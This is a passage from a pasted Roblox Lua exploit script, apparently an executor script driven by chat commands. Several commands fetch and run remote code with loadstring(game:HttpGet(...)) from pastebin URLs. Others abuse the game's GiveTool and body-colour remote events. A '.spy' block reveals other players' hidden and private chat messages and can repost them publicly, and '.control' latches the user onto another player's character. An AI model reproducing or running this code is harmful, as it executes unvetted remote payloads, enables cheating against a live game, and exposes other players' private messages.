  604. loadstring(game:HttpGet("https://pastebin.com/raw/sAN4RA2F"))()
  605. end
  606. if msg:lower() == ".cloud" then
  607. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  608. end
  609. if msg:lower() == ".noob" then
  610. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  611. wait()
  612. loadstring(game:HttpGet("https://pastebin.com/raw/aUnrfhmy"))()
  613. end
  614. if msg:lower() == ".spy" then
  615. --This script reveals ALL hidden messages in the default chat
  616. --chat "/spy" to toggle!
  617. enabled = true
  618. --if true will check your messages too
  619. spyOnMyself = true
  620. --if true will chat the logs publicly (fun, risky)
  621. public = false
  622. --if true will use /me to stand out
  623. publicItalics = true
  624. --customize private logs
  625. privateProperties = {
  626. Color = Color3.fromRGB(0,255,255);
  627. Font = Enum.Font.SourceSansBold;
  628. TextSize = 18;
  629. }
  630. --////////////////////////////////////////////////////////////////
  631. local StarterGui = game:GetService("StarterGui")
  632. local Players = game:GetService("Players")
  633. local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer
  634. local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
  635. local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
  636. local instance = (_G.chatSpyInstance or 0) + 1
  637. _G.chatSpyInstance = instance
  638.  
  639. local function onChatted(p,msg)
  640. if _G.chatSpyInstance == instance then
  641. if p==player and msg:lower():sub(1,4)=="/spy" then
  642. enabled = not enabled
  643. wait(0.3)
  644. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  645. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  646. elseif enabled and (spyOnMyself==true or p~=player) then
  647. msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
  648. local hidden = true
  649. local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
  650. if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then
  651. hidden = false
  652. end
  653. end)
  654. wait(1)
  655. conn:Disconnect()
  656. if hidden and enabled then
  657. if public then
  658. saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
  659. else
  660. privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
  661. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  662. end
  663. end
  664. end
  665. end
  666. end
  667.  
  668. for _,p in ipairs(Players:GetPlayers()) do
  669. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  670. end
  671. Players.PlayerAdded:Connect(function(p)
  672. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  673. end)
  674. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  675. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  676. if not player.PlayerGui:FindFirstChild("Chat") then wait(3) end
  677. local chatFrame = player.PlayerGui.Chat.Frame
  678. chatFrame.ChatChannelParentFrame.Visible = true
  679. chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
  680. end
  681. if msg:lower() == ".machinegun" then
  682. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  683. wait()
  684. loadstring(game:HttpGet("https://pastebin.com/raw/GgGWi3yp"))()
  685. end
  686. if string.sub(msg,1,6) == (".body")then
  687. while true do
  688. for i = 0,1,0.1 do
  689. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new(Color3.fromHSV(i,1,1)))
  690. wait(.1)
  691. end
  692. end
  693. end
  694. if string.sub(msg,1,2) == ("re")then
  695. game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(15)
  696. end
  697. if string.sub(msg,1,3) == (".rj")then
  698. game:GetService("TeleportService"):Teleport(game.PlaceId,
  699. game:GetService("Players").LocalPlayer)
  700. end
  701. local gamepassId = IDFORSPAWNER
  702.  
  703. local RobloxianLife = loadstring(game:HttpGetAsync("https://pastebin.com/raw/HTF0vRHF"))()
  704. local CommandApi = loadstring(game:HttpGetAsync("https://pastebin.com/raw/3mHL7pKv"))()
  705. local players = game:GetService("Players")
  706. local localPlayer = players.localPlayer
  707.  
  708. RobloxianLife:Initialize(gamepassId)
  709.  
  710. local function strStarts(String,Start)
  711. return string.sub(String,1,string.len(Start))==Start
  712. end
  713.  
  714. local function getPlayerByName(name)
  715. local plrs = {}
  716.  
  717. if name == "me" then
  718. table.insert(plrs, localPlayer)
  719. return plrs
  720. elseif name == "others" then
  721. for i,v in pairs(players:GetPlayers()) do
  722. if v.Name ~= localPlayer.Name then
  723. table.insert(plrs, v)
  724. end
  725. end
  726. return plrs
  727. elseif name == "all" then
  728. for i,v in pairs(players:GetPlayers()) do
  729. table.insert(plrs, v)
  730. end
  731. return plrs
  732. elseif name == "random" then
  733. table.insert(plrs, players:GetPlayers()[math.random(1, #players:GetPlayers())])
  734. return plrs
  735. end
  736.  
  737. for i,v in pairs(players:GetPlayers()) do
  738. if strStarts(v.Name, name) then
  739. table.insert(plrs, v)
  740. end
  741. end
  742. return plrs
  743. end
  744.  
  745. CommandApi:AddCommand(".control", function(name)
  746. for i,v in pairs(getPlayerByName(name)) do
  747. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid, "HipHeight", 0.1)
  748. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid.RootPart.RootJoint, "Part1", v.Character:FindFirstChild'Torso' and v.Character.Torso or v.Character.LowerTorso)
  749. end
  750. end)
  751.  
  752. CommandApi:AddCommand(".size", function(mult)
  753. mult = tonumber(mult)
  754. if not mult then return end
  755.  
  756. local function multiplycf(cf, m)
  757. return CFrame.new(cf.p*m)*CFrame.fromOrientation(cf:ToOrientation())
  758. end
  759.  
  760. for i,v in pairs(localPlayer.Character:GetDescendants()) do
  761. if v:isA"BasePart" then
  762. RobloxianLife:SetLocalProperty(v,"Size", v.Size*mult)
  763. elseif v:isA"Motor6D" then
  764. RobloxianLife:SetLocalProperty(v,"C0", multiplycf(v.C0, mult))
  765. RobloxianLife:SetLocalProperty(v,"C1", multiplycf(v.C1, mult))
  766. end
  767. end
  768. end)
  769.  
  770. local chatConnection = localPlayer.Chatted:Connect(CommandApi.OnChatted)
  771.  
  772. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement